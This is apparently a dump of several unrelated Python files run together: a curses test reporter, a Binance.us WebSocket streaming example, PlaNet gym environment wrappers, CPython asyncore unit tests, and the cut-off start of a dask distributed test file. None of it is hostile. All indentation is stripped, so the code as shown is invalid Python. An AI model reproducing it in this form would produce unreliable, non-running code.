def begin_test(self, description, cmdline_args, input, tempfile):
description = description or ""
self._reports.append(Report(description, self.MAX_W, cmdline_args, input, tempfile))
if self._report_index == 0:
self._report_index = 1
self._update()
@_synchronized
def end_test(self):
pass
@_synchronized
def execution_result(self, cmdline_args, execution_result, test):
info = {
'progname': cmdline_args[0],
'status': execution_result.status
}
message = self._RESULT_TABLE[execution_result.result]
if execution_result.result != executor.ER_OK:
self._err_count += 1
message = message.format(**info)
for line in message.splitlines():
self._reports[-1].add_line(line, curses.color_pair(self.COLOR_ERR))
self._reports[-1].output = execution_result.output
self._update()
def _new_section(self, section_name):
if section_name not in self._sections:
self._sections.append(section_name)
self._err_counts[section_name] = 0
self._warn_counts[section_name] = 0
self._ok_counts[section_name] = 0
@_synchronized
def comparison_result(self, expected, got, diffs, matches):
add = self._reports[-1].add_line
all_ok = (max(diffs, default=0) <= 0)
self._new_section(expected.tag)
if all_ok:
self._ok_count += 1
self._ok_counts[expected.tag] += 1
else:
self._err_count += 1
self._err_counts[expected.tag] += 1
color = curses.color_pair(self.COLOR_OK if all_ok else self.COLOR_ERR)
add("[%s]" % expected.tag, color | curses.A_BOLD)
err_diff = "%s\t\t(" +_("expected") + " '%s')"
err_un = "%s\t\t(" + _("this line was not expected") + ")"
err_mis = "\t\t(" + _("missing line") + " '%s'"
for (i, d) in enumerate(diffs):
try:
out_string = formatter.handle_non_printable_chars(got.content[i])
except IndexError:
out_string = ''
if d <= 0:
# Correct
add(out_string, curses.color_pair(self.COLOR_OK))
elif matches[i] is None:
# Extra line
add(err_un % out_string, curses.color_pair(self.COLOR_ERR))
elif i >= len(got.content):
# Missing line
add(err_mis % matches[i], curses.color_pair(self.COLOR_ERR))
else:
# Mismatching lines
add(err_diff % (out_string, matches[i]), curses.color_pair(self.COLOR_ERR))
add("")
self._update()
@_synchronized
def missing_section(self, expected):
self._new_section(expected.tag)
self._warn_count += 1
self._warn_counts[expected.tag] += 1
message = ("\t\t(" + _("section [%s] is missing") + ")") % expected.tag
self._reports[-1].add_line(message, curses.color_pair(self.COLOR_WARN))
self._reports[-1].add_line("")
self._update()
class Report:
"""Test result displayed on the screen."""
def __init__(self, title, max_width, cmdline_args="", input="", tempfile=""):
"""Create a new report with the given title.
Lines are truncated to max_width.
"""
self.title = title
self._length = 0
self._max_width = max_width
self._pad = curses.newpad(1, max_width)
self._position = 0
self._cmdline_args = cmdline_args
self._input = input
self._tempfile = tempfile
self.output = ""
def add_line(self, line, *extra):
"""Add a line at the bottom of the document."""
self._pad.resize(self._length + 1, self._max_width)
self._pad.addnstr(self._length, 0, line, self._max_width, *extra)
self._length += 1
def scroll(self, page_height, lines=0, pages=0, documents=0):
"""Scroll up or down."""
amount = lines + page_height * pages + documents * self._length
self._position = max(0, min(self._position + amount, self._length - page_height))
def refresh(self, page_height, page_width):
"""Redraw the document on the screen."""
self._pad.refresh(self._position, 0, 0, 0, page_height - 1, page_width - 1)
def top(self):
"""Index of the first line on the screen (starting from 1)."""
return self._position + 1
def bottom(self, page_height):
"""Index of the last line on the screen."""
return min(self._position + page_height, self._length)
def length(self):
"""Number of lines in the document."""
return self._length
def info(self):
lines = [_("Test title: %s") % self.title]
# , "", _("Command line: %s") % " ".join(self._cmdline_args)]
if self._cmdline_args:
lines.append("")
args = [_("TEMP_FILE") if x is executor.ARG_TMPFILE else x for x in self._cmdline_args]
lines.append(_("Command line: %s") % " ".join(args))
if self._input and self._input.strip():
lines.extend(["", _("Input:")])
lines.extend(self._input.splitlines())
if self._tempfile:
lines.extend(["", _("Temporary file:")])
lines.extend(self._tempfile.splitlines())
return "\n".join(lines)
|
example_binance_us.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_us.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
logging.getLogger('unicorn-log').addHandler(logging.StreamHandler())
logging.getLogger('unicorn-log').setLevel(logging.INFO)
# create instance of BinanceWebSocketApiManager for Binance Jersey
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.us")
print("starting monitoring api!")
binance_websocket_api_manager.start_monitoring_api()
# set api key and secret for userData stream
binance_us_api_key = ""
binance_us_api_secret = ""
binance_websocket_api_manager.set_private_api_config(binance_us_api_key, binance_us_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"])
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!ticker"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])
markets = {'btcusd', 'btcxrp', 'ethusd', 'bnbusd', 'busdusd'}
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["trade"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w',
'miniTicker', 'depth20'}
binance_websocket_api_manager.create_stream(channels, markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
|
wrappers.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Environment wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import datetime
import io
import multiprocessing
import os
import sys
import traceback
import uuid
import gym
import gym.spaces
import numpy as np
import skimage.transform
import tensorflow as tf
from planet.tools import nested
class ObservationDict(object):
def __init__(self, env, key='observ'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: obs}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: obs}
return obs
class ConcatObservation(object):
"""Select observations from a dict space and concatenate them."""
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
spaces = [spaces[key] for key in self._keys]
low = np.concatenate([space.low for space in spaces], 0)
high = np.concatenate([space.high for space in spaces], 0)
dtypes = [space.dtype for space in spaces]
if not all(dtype == dtypes[0] for dtype in dtypes):
message = 'Spaces must have the same data type; are {}.'
raise KeyError(message.format(', '.join(str(x) for x in dtypes)))
return gym.spaces.Box(low, high, dtype=dtypes[0])
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = self._select_keys(obs)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = self._select_keys(obs)
return obs
def _select_keys(self, obs):
return np.concatenate([obs[key] for key in self._keys], 0)
class SelectObservations(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
return gym.spaces.Dict({key: spaces[key] for key in self._keys})
@property
def action_space(self):
return self._env.action_space
def step(self, action, *args, **kwargs):
obs, reward, done, info = self._env.step(action, *args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs, reward, done, info
def reset(self, *args, **kwargs):
obs = self._env.reset(*args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs
class PixelObservations(object):
def __init__(self, env, size=(64, 64), dtype=np.uint8, key='image'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self._env = env
self._size = size
self._dtype = dtype
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self._env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs[self._key] = self._render_image()
return obs
def _render_image(self):
image = self._env.render('rgb_array')
if image.shape[:2] != self._size:
kwargs = dict(mode='edge', order=1, preserve_range=True)
image = skimage.transform.resize(image, self._size, **kwargs)
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
class OverwriteRender(object):
def __init__(self, env, render_fn):
self._env = env
self._render_fn = render_fn
self._env.render('rgb_array') # Set up viewer.
def __getattr__(self, name):
return getattr(self._env, name)
def render(self, *args, **kwargs):
return self._render_fn(self._env, *args, **kwargs)
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class DeepMindWrapper(object):
"""Wraps a DM Control environment into a Gym interface."""
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, env, render_size=(64, 64), camera_id=0):
self._env = env
self._render_size = render_size
self._camera_id = camera_id
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
else:
assert not done
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ProcessObservation(object):
def __init__(self, env, process_fn):
self._env = env
self._process_fn = process_fn
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return nested.map(
lambda box: gym.spaces.Box(
self._process_fn(box.low),
self._process_fn(box.high),
dtype=self._process_fn(box.low).dtype),
self._env.observation_space)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
class PadActions(object):
"""Pad action space to the largest action space."""
def __init__(self, env, spaces):
self._env = env
self._action_space = self._pad_box_space(spaces)
@property
def observation_space(self):
return self._env.observation_space
@property
def action_space(self):
return self._action_space
def step(self, action, *args, **kwargs):
action = action[:len(self._env.action_space.low)]
return self._env.step(action, *args, **kwargs)
def reset(self, *args, **kwargs):
return self._env.reset(*args, **kwargs)
def _pad_box_space(self, spaces):
assert all(len(space.low.shape) == 1 for space in spaces)
length = max(len(space.low) for space in spaces)
low, high = np.inf * np.ones(length), -np.inf * np.ones(length)
for space in spaces:
low[:len(space.low)] = np.minimum(space.low, low[:len(space.low)])
high[:len(space.high)] = np.maximum(space.high, high[:len(space.high)])
return gym.spaces.Box(low, high, dtype=np.float32)
class CollectGymDataset(object):
"""Collect transition tuples and store episodes as Numpy files."""
def __init__(self, env, outdir):
self._env = env
self._outdir = outdir and os.path.expanduser(outdir)
self._episode = None
self._transition = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
if kwargs.get('blocking', True):
transition = self._env.step(action, *args, **kwargs)
return self._process_step(action, *transition)
else:
future = self._env.step(action, *args, **kwargs)
return lambda: self._process_step(action, *future())
def reset(self, *args, **kwargs):
if kwargs.get('blocking', True):
observ = self._env.reset(*args, **kwargs)
return self._process_reset(observ)
else:
future = self._env.reset(*args, **kwargs)
return lambda: self._process_reset(future())
def _process_step(self, action, observ, reward, done, info):
self._transition.update({'action': action, 'reward': reward})
self._transition.update(info)
self._episode.append(self._transition)
self._transition = {}
if not done:
self._transition.update(self._process_observ(observ))
else:
episode = self._get_episode()
info['episode'] = episode
if self._outdir:
filename = self._get_filename()
self._write(episode, filename)
return observ, reward, done, info
def _process_reset(self, observ):
self._episode = []
self._transition = {}
self._transition.update(self._process_observ(observ))
return observ
def _process_observ(self, observ):
if not isinstance(observ, dict):
observ = {'observ': observ}
return observ
def _get_filename(self):
timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
identifier = str(uuid.uuid4()).replace('-', '')
filename = '{}-{}.npz'.format(timestamp, identifier)
filename = os.path.join(self._outdir, filename)
return filename
def _get_episode(self):
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: np.array(v) for k, v in episode.items()}
for key, sequence in episode.items():
if sequence.dtype == 'object':
message = "Sequence '{}' is not numeric:\n{}"
raise RuntimeError(message.format(key, sequence))
return episode
def _write(self, episode, filename):
if not tf.gfile.Exists(self._outdir):
tf.gfile.MakeDirs(self._outdir)
with io.BytesIO() as file_:
np.savez_compressed(file_, **episode)
file_.seek(0)
with tf.gfile.Open(filename, 'w') as ff:
ff.write(file_.read())
name = os.path.splitext(os.path.basename(filename))[0]
tf.logging.info('Recorded episode {}.'.format(name))
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
HOST = test_support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEquals(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEquals(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEquals(lines, expected)
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
cap = StringIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
if hasattr(asyncore, 'file_wrapper'):
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = "It's not dead, it's sleeping!"
file(TESTFN, 'w').write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), "It's not dead")
self.assertEqual(w.read(6), ", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = "Come again?"
d2 = "I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll]
if hasattr(asyncore, 'file_wrapper'):
tests.append(FileWrapperTest)
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
test_utils_test.py
|
import asyncio
import os
import pathlib
import signal
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
import yaml
from tornado import gen
import dask.config
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.compatibility import WINDOWS
from distributed.core import Server, rpc
from distributed.metrics import time
from distributed.utils import mp_context
from distributed.utils_test import (
_LockedCommPool,
_UnhashableCallable,
assert_worker_story,
check_process_leak,
cluster,
dump_cluster_state,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
